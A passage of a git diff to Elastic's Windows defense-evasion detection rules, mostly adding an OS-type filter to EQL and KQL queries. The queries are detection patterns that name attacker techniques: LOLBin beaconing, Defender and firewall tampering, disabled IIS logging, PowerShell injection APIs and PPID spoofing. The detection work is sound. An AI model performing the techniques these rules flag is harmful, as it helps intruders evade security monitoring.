"C:\\Windows\\ServiceState\\*.exe","C:\\Windows\\security\\*.exe","C:\\Windows\\IdentityCRL\\*.exe","C:\\Windows\\Branding\\*.exe","C:\\Windows\\csc\\*.exe", diff --git a/rules/windows/defense_evasion_hide_encoded_executable_registry.toml b/rules/windows/defense_evasion_hide_encoded_executable_registry.toml index abe09c886..02c6e8e63 100644 --- a/rules/windows/defense_evasion_hide_encoded_executable_registry.toml +++ b/rules/windows/defense_evasion_hide_encoded_executable_registry.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -25,7 +25,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where +registry where host.os.type == "windows" and /* update here with encoding combinations */ registry.data.strings : "TVqQAAMAAAAEAAAA*" ''' diff --git a/rules/windows/defense_evasion_iis_httplogging_disabled.toml b/rules/windows/defense_evasion_iis_httplogging_disabled.toml index b1ba5d63d..806c63d8b 100644 --- a/rules/windows/defense_evasion_iis_httplogging_disabled.toml +++ b/rules/windows/defense_evasion_iis_httplogging_disabled.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/09" +updated_date = "2023/03/02" [rule] author = ["Elastic"] @@ -64,7 +64,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.name : "appcmd.exe" or process.pe.original_file_name == "appcmd.exe") and process.args : "/dontLog*:*True" and not process.parent.name : "iissetup.exe" diff --git a/rules/windows/defense_evasion_injection_msbuild.toml b/rules/windows/defense_evasion_injection_msbuild.toml index 08cc0cacf..d5bee584d 100755 --- a/rules/windows/defense_evasion_injection_msbuild.toml +++ b/rules/windows/defense_evasion_injection_msbuild.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -25,7 +25,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -process.name:MSBuild.exe and event.action:"CreateRemoteThread detected (rule: CreateRemoteThread)" +process.name:MSBuild.exe and host.os.type:windows and event.action:"CreateRemoteThread detected (rule: CreateRemoteThread)" ''' diff --git a/rules/windows/defense_evasion_installutil_beacon.toml b/rules/windows/defense_evasion_installutil_beacon.toml index c47c9f4f3..4e270d971 100644 --- a/rules/windows/defense_evasion_installutil_beacon.toml +++ b/rules/windows/defense_evasion_installutil_beacon.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,8 +27,8 @@ query = ''' /* the benefit of doing this as an eql sequence vs kql is this will limit to alerting only on the first network connection */ sequence by process.entity_id - [process where event.type == "start" and process.name : "installutil.exe"] - [network where process.name : "installutil.exe" and network.direction : ("outgoing", "egress")] + [process where host.os.type == "windows" and event.type == "start" and process.name : "installutil.exe"] + [network where host.os.type == "windows" and process.name : "installutil.exe" and network.direction : ("outgoing", "egress")] ''' diff --git a/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml b/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml index 7e04d9d89..fd0ffc1da 100644 --- a/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml +++ b/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.name : ("esensor.exe", "elastic-endpoint.exe") and process.parent.executable != null and /* add FPs here */ diff --git a/rules/windows/defense_evasion_masquerading_renamed_autoit.toml b/rules/windows/defense_evasion_masquerading_renamed_autoit.toml index dd108e0d7..e68d9ee7f 100644 --- a/rules/windows/defense_evasion_masquerading_renamed_autoit.toml +++ b/rules/windows/defense_evasion_masquerading_renamed_autoit.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/09" +updated_date = "2023/03/02" [rule] author = ["Elastic"] @@ -79,7 +79,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.pe.original_file_name : "AutoIt*.exe" and not process.name : "AutoIt*.exe" ''' diff --git a/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml b/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml index 2a0c2aafb..4ea706f05 100644 --- a/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml +++ b/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/21" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -36,7 +36,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name : "WerFault.exe" and diff --git a/rules/windows/defense_evasion_masquerading_trusted_directory.toml b/rules/windows/defense_evasion_masquerading_trusted_directory.toml index 019d73061..150922343 100644 --- a/rules/windows/defense_evasion_masquerading_trusted_directory.toml +++ b/rules/windows/defense_evasion_masquerading_trusted_directory.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.executable : "C:\\*Program*Files*\\*.exe" and not process.executable : ("C:\\Program Files\\*.exe", "C:\\Program Files (x86)\\*.exe", "C:\\Users\\*.exe", "C:\\ProgramData\\*.exe") ''' diff --git a/rules/windows/defense_evasion_masquerading_werfault.toml b/rules/windows/defense_evasion_masquerading_werfault.toml index 33ddf6c8d..eaab7d9d2 100644 --- a/rules/windows/defense_evasion_masquerading_werfault.toml +++ b/rules/windows/defense_evasion_masquerading_werfault.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/09" +updated_date = "2023/03/02" [rule] author = ["Elastic"] @@ -82,8 +82,8 @@ type = "eql" query = ''' sequence by host.id, process.entity_id with maxspan = 5s - [process where event.type:"start" and process.name : ("wermgr.exe", "WerFault.exe") and process.args_count == 1] - [network where process.name : ("wermgr.exe", "WerFault.exe") and network.protocol != "dns" and + [process where host.os.type == "windows" and event.type:"start" and process.name : ("wermgr.exe", "WerFault.exe") and process.args_count == 1] + [network where host.os.type == "windows" and process.name : ("wermgr.exe", "WerFault.exe") and network.protocol != "dns" and network.direction : ("outgoing", "egress") and destination.ip !="::1" and destination.ip !="127.0.0.1" ] ''' diff --git a/rules/windows/defense_evasion_microsoft_defender_tampering.toml b/rules/windows/defense_evasion_microsoft_defender_tampering.toml index 60ecb3d15..426103e78 100644 --- a/rules/windows/defense_evasion_microsoft_defender_tampering.toml +++ b/rules/windows/defense_evasion_microsoft_defender_tampering.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Austin Songer"] @@ -77,7 +77,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where event.type in ("creation", "change") and +registry where host.os.type == "windows" and event.type in ("creation", "change") and (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\PUAProtection" and registry.data.strings : ("0", "0x00000000")) or (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\App and Browser protection\\DisallowExploitProtectionOverride" and diff --git a/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml b/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml index 951d0f3ba..87136d98a 100644 --- a/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml +++ b/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,10 +27,10 @@ type = "eql" query = ''' sequence by process.entity_id - [process where (process.name : "expand.exe" or process.name : "extrac32.exe" or + [process where host.os.type == "windows" and (process.name : "expand.exe" or process.name : "extrac32.exe" or process.name : "ieexec.exe" or process.name : "makecab.exe") and event.type == "start"] - [network where (process.name : "expand.exe" or process.name : "extrac32.exe" or + [network where host.os.type == "windows" and (process.name : "expand.exe" or process.name : "extrac32.exe" or process.name : "ieexec.exe" or process.name : "makecab.exe") and not cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", "192.0.0.8/32", diff --git a/rules/windows/defense_evasion_ms_office_suspicious_regmod.toml b/rules/windows/defense_evasion_ms_office_suspicious_regmod.toml index b6a7a7bdf..35eb55fd5 100644 --- a/rules/windows/defense_evasion_ms_office_suspicious_regmod.toml +++ b/rules/windows/defense_evasion_ms_office_suspicious_regmod.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -86,7 +86,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where event.type == "change" and +registry where host.os.type == "windows" and event.type == "change" and registry.path : ( "HKU\\S-1-5-21-*\\SOFTWARE\\Microsoft\\Office\\*\\Security\\AccessVBOM", "HKU\\S-1-5-21-*\\SOFTWARE\\Microsoft\\Office\\*\\Security\\VbaWarnings", diff --git a/rules/windows/defense_evasion_msbuild_beacon_sequence.toml b/rules/windows/defense_evasion_msbuild_beacon_sequence.toml index 831f62ad4..85f138312 100644 --- a/rules/windows/defense_evasion_msbuild_beacon_sequence.toml +++ b/rules/windows/defense_evasion_msbuild_beacon_sequence.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "development" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -25,8 +25,8 @@ query = ''' /* duplicate of MsBuild Making Network Connections - 0e79980b-4250-4a50-a509-69294c14e84b */ sequence by process.entity_id - [process where event.type == "start" and process.name : "MSBuild.exe"] - [network where process.name : "MSBuild.exe" and + [process where host.os.type == "windows" and event.type == "start" and process.name : "MSBuild.exe"] + [network where host.os.type == "windows" and process.name : "MSBuild.exe" and not (destination.ip == "127.0.0.1" and source.ip == "127.0.0.1")] ''' diff --git a/rules/windows/defense_evasion_msbuild_making_network_connections.toml b/rules/windows/defense_evasion_msbuild_making_network_connections.toml index 40af128bc..da870699d 100644 --- a/rules/windows/defense_evasion_msbuild_making_network_connections.toml +++ b/rules/windows/defense_evasion_msbuild_making_network_connections.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -25,8 +25,8 @@ type = "eql" query = ''' sequence by process.entity_id - [process where process.name : "MSBuild.exe" and event.type == "start"] - [network where process.name : "MSBuild.exe" and + [process where host.os.type == "windows" and process.name : "MSBuild.exe" and event.type == "start"] + [network where host.os.type == "windows" and process.name : "MSBuild.exe" and not cidrmatch(destination.ip, "127.0.0.1", "::1")] ''' diff --git a/rules/windows/defense_evasion_mshta_beacon.toml b/rules/windows/defense_evasion_mshta_beacon.toml index 88db5270b..2993d680e 100644 --- a/rules/windows/defense_evasion_mshta_beacon.toml +++ b/rules/windows/defense_evasion_mshta_beacon.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -25,12 +25,12 @@ type = "eql" query = ''' sequence by process.entity_id with maxspan=10m - [process where event.type == "start" and process.name : "mshta.exe" and + [process where host.os.type == "windows" and event.type == "start" and process.name : "mshta.exe" and not process.parent.name : "Microsoft.ConfigurationManagement.exe" and not (process.parent.executable : "C:\\Amazon\\Amazon Assistant\\amazonAssistantService.exe" or process.parent.executable : "C:\\TeamViewer\\TeamViewer.exe") and not process.args : "ADSelfService_Enroll.hta"] - [network where process.name : "mshta.exe"] + [network where host.os.type == "windows" and process.name : "mshta.exe"] ''' diff --git a/rules/windows/defense_evasion_msxsl_beacon.toml b/rules/windows/defense_evasion_msxsl_beacon.toml index 6ce88eb49..4360cfdc1 100644 --- a/rules/windows/defense_evasion_msxsl_beacon.toml +++ b/rules/windows/defense_evasion_msxsl_beacon.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "development" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -25,8 +25,8 @@ query = ''' /* duplicate of Network Connection via MsXsl - b86afe07-0d98-4738-b15d-8d7465f95ff5 */ sequence by process.entity_id - [process where event.type == "start" and process.name : "msxsl.exe"] - [network where process.name : "msxsl.exe" and network.direction : ("outgoing", "egress")] + [process where host.os.type == "windows" and event.type == "start" and process.name : "msxsl.exe"] + [network where host.os.type == "windows" and process.name : "msxsl.exe" and network.direction : ("outgoing", "egress")] ''' diff --git a/rules/windows/defense_evasion_msxsl_network.toml b/rules/windows/defense_evasion_msxsl_network.toml index 4b372cac5..0cdbcee14 100644 --- a/rules/windows/defense_evasion_msxsl_network.toml +++ b/rules/windows/defense_evasion_msxsl_network.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,8 +26,8 @@ type = "eql" query = ''' sequence by process.entity_id - [process where process.name : "msxsl.exe" and event.type == "start"] - [network where process.name : "msxsl.exe" and + [process where host.os.type == "windows" and process.name : "msxsl.exe" and event.type == "start"] + [network where host.os.type == "windows" and process.name : "msxsl.exe" and not cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24", "192.168.0.0/16", "192.88.99.0/24", "224.0.0.0/4", diff --git a/rules/windows/defense_evasion_network_connection_from_windows_binary.toml b/rules/windows/defense_evasion_network_connection_from_windows_binary.toml index 70012806a..c6ef8d38f 100644 --- a/rules/windows/defense_evasion_network_connection_from_windows_binary.toml +++ b/rules/windows/defense_evasion_network_connection_from_windows_binary.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/06" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -79,7 +79,7 @@ type = "eql" query = ''' sequence by process.entity_id with maxspan=5m - [process where event.type == "start" and + [process where host.os.type == "windows" and event.type == "start" and /* known applocker bypasses */ (process.name : "bginfo.exe" or diff --git a/rules/windows/defense_evasion_parent_process_pid_spoofing.toml b/rules/windows/defense_evasion_parent_process_pid_spoofing.toml index 69f9d5a13..bd06daf99 100644 --- a/rules/windows/defense_evasion_parent_process_pid_spoofing.toml +++ b/rules/windows/defense_evasion_parent_process_pid_spoofing.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/15" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ query = ''' sequence by host.id, user.id with maxspan=3m - [process where event.type == "start" and + [process where host.os.type == "windows" and event.type == "start" and process.Ext.token.integrity_level_name != "system" and ( process.pe.original_file_name : ("winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe", "eqnedt32.exe", @@ -52,7 +52,7 @@ sequence by host.id, user.id with maxspan=3m "?:\\Windows\\System32\\WerFault.exe", "?:\\Windows\\SysWOW64\\WerFault.exe") ] by process.pid - [process where event.type == "start" and + [process where host.os.type == "windows" and event.type == "start" and process.parent.Ext.real.pid > 0 and /* process.parent.Ext.real.pid is only populated if the parent process pid doesn't match */ diff --git a/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml b/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml index 5fbd0e58d..8e012822c 100644 --- a/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml +++ b/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -39,7 +39,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where registry.path : ( +registry where host.os.type == "windows" and registry.path : ( "HKLM\\*\\LocalAccountTokenFilterPolicy", "\\REGISTRY\\MACHINE\\*\\LocalAccountTokenFilterPolicy") and registry.data.strings : ("1", "0x00000001") diff --git a/rules/windows/defense_evasion_posh_assembly_load.toml b/rules/windows/defense_evasion_posh_assembly_load.toml index ae2c33478..dc37bd7ad 100644 --- a/rules/windows/defense_evasion_posh_assembly_load.toml +++ b/rules/windows/defense_evasion_posh_assembly_load.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/15" integration = ["windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -103,7 +103,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and +event.category:process and host.os.type:windows and powershell.file.script_block_text : ( "[System.Reflection.Assembly]::Load" or "[Reflection.Assembly]::Load" diff --git a/rules/windows/defense_evasion_posh_compressed.toml b/rules/windows/defense_evasion_posh_compressed.toml index e51cb68de..d0b96d343 100644 --- a/rules/windows/defense_evasion_posh_compressed.toml +++ b/rules/windows/defense_evasion_posh_compressed.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/19" integration = ["windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -103,7 +103,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and +event.category:process and host.os.type:windows and powershell.file.script_block_text : ( ( "System.IO.Compression.DeflateStream" or diff --git a/rules/windows/defense_evasion_posh_encryption.toml b/rules/windows/defense_evasion_posh_encryption.toml index 1a99259a1..28fe9b635 100644 --- a/rules/windows/defense_evasion_posh_encryption.toml +++ b/rules/windows/defense_evasion_posh_encryption.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/23" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and +event.category:process and host.os.type:windows and powershell.file.script_block_text : ( ( "Cryptography.AESManaged" or diff --git a/rules/windows/defense_evasion_posh_process_injection.toml b/rules/windows/defense_evasion_posh_process_injection.toml index 8526c8295..4ee9b0824 100644 --- a/rules/windows/defense_evasion_posh_process_injection.toml +++ b/rules/windows/defense_evasion_posh_process_injection.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/05" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -88,7 +88,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and +event.category:process and host.os.type:windows and powershell.file.script_block_text : ( (VirtualAlloc or VirtualAllocEx or VirtualProtect or LdrLoadDll or LoadLibrary or LoadLibraryA or LoadLibraryEx or GetProcAddress or OpenProcess or OpenProcessToken or AdjustTokenPrivileges) and diff --git a/rules/windows/defense_evasion_potential_processherpaderping.toml b/rules/windows/defense_evasion_potential_processherpaderping.toml index 838d40c00..981b3d7e7 100644 --- a/rules/windows/defense_evasion_potential_processherpaderping.toml +++ b/rules/windows/defense_evasion_potential_processherpaderping.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,14 +26,14 @@ type = "eql" query = ''' sequence with maxspan=5s - [process where event.type == "start" and not process.parent.executable : + [process where host.os.type == "windows" and event.type == "start" and not process.parent.executable : ( "?:\\Windows\\SoftwareDistribution\\*.exe", "?:\\Program Files\\Elastic\\Agent\\data\\*.exe", "?:\\Program Files (x86)\\Trend Micro\\*.exe" ) ] by host.id, process.executable, process.parent.entity_id - [file where event.type == "change" and event.action == "overwrite" and file.extension == "exe"] by host.id, file.path, process.entity_id + [file where host.os.type == "windows" and event.type == "change" and event.action == "overwrite" and file.extension == "exe"] by host.id, file.path, process.entity_id ''' diff --git a/rules/windows/defense_evasion_powershell_windows_firewall_disabled.toml b/rules/windows/defense_evasion_powershell_windows_firewall_disabled.toml index 28157aaad..c42aacd21 100644 --- a/rules/windows/defense_evasion_powershell_windows_firewall_disabled.toml +++ b/rules/windows/defense_evasion_powershell_windows_firewall_disabled.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Austin Songer"] @@ -83,7 +83,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.action == "start" and +process where host.os.type == "windows" and event.action == "start" and (process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") or process.pe.original_file_name == "PowerShell.EXE") and process.args : "*Set-NetFirewallProfile*" and (process.args : "*-Enabled*" and process.args : "*False*") and diff --git a/rules/windows/defense_evasion_process_termination_followed_by_deletion.toml b/rules/windows/defense_evasion_process_termination_followed_by_deletion.toml index d6a61782e..75d883b17 100644 --- a/rules/windows/defense_evasion_process_termination_followed_by_deletion.toml +++ b/rules/windows/defense_evasion_process_termination_followed_by_deletion.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,11 +27,11 @@ type = "eql" query = ''' sequence by host.id with maxspan=5s - [process where event.type == "end" and + [process where host.os.type == "windows" and event.type == "end" and process.code_signature.trusted != true and not process.executable : ("C:\\Windows\\SoftwareDistribution\\*.exe", "C:\\Windows\\WinSxS\\*.exe") ] by process.executable - [file where event.type == "deletion" and file.extension : ("exe", "scr", "com") and + [file where host.os.type == "windows" and event.type == "deletion" and file.extension : ("exe", "scr", "com") and not process.executable : ("?:\\Program Files\\*.exe", "?:\\Program Files (x86)\\*.exe", diff --git a/rules/windows/defense_evasion_proxy_execution_via_msdt.toml b/rules/windows/defense_evasion_proxy_execution_via_msdt.toml index d12069582..ce1fda7f5 100644 --- a/rules/windows/defense_evasion_proxy_execution_via_msdt.toml +++ b/rules/windows/defense_evasion_proxy_execution_via_msdt.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -33,7 +33,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.pe.original_file_name == "msdt.exe" or process.name : "msdt.exe") and ( process.args : ("IT_RebrowseForFile=*", "ms-msdt:/id", "ms-msdt:-id", "*FromBase64*") or diff --git a/rules/windows/defense_evasion_rundll32_no_arguments.toml b/rules/windows/defense_evasion_rundll32_no_arguments.toml index 576455d00..48876f060 100644 --- a/rules/windows/defense_evasion_rundll32_no_arguments.toml +++ b/rules/windows/defense_evasion_rundll32_no_arguments.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,11 +26,11 @@ type = "eql" query = ''' sequence with maxspan=1h - [process where event.type == "start" and + [process where host.os.type == "windows" and event.type == "start" and (process.name : "rundll32.exe" or process.pe.original_file_name == "RUNDLL32.EXE") and process.args_count == 1 ] by process.entity_id - [process where event.type == "start" and process.parent.name : "rundll32.exe" + [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "rundll32.exe" ] by process.parent.entity_id ''' diff --git a/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml b/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml index df0a92580..d95dc0290 100644 --- a/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml +++ b/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -31,7 +31,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where +registry where host.os.type == "windows" and registry.path : ( "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Configuration\\EnableAt", "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Configuration\\EnableAt" diff --git a/rules/windows/defense_evasion_sdelete_like_filename_rename.toml b/rules/windows/defense_evasion_sdelete_like_filename_rename.toml index 0a1daa948..c623a29fd 100644 --- a/rules/windows/defense_evasion_sdelete_like_filename_rename.toml +++ b/rules/windows/defense_evasion_sdelete_like_filename_rename.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -33,7 +33,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type == "change" and file.name : "*AAA.AAA" +file where host.os.type == "windows" and event.type == "change" and file.name : "*AAA.AAA" ''' diff --git a/rules/windows/defense_evasion_sip_provider_mod.toml b/rules/windows/defense_evasion_sip_provider_mod.toml index c4250a05b..a8c6c9e94 100644 --- a/rules/windows/defense_evasion_sip_provider_mod.toml +++ b/rules/windows/defense_evasion_sip_provider_mod.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,7 +27,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where event.type:"change" and +registry where host.os.type == "windows" and event.type:"change" and registry.path: ( "*\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllPutSignedDataMsg\\{*}\\Dll", "*\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllPutSignedDataMsg\\{*}\\Dll", diff --git a/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml b/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml index 4324ae4e8..6bd9e0617 100644 --- a/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml +++ b/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -32,7 +32,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where registry.path : ( +registry 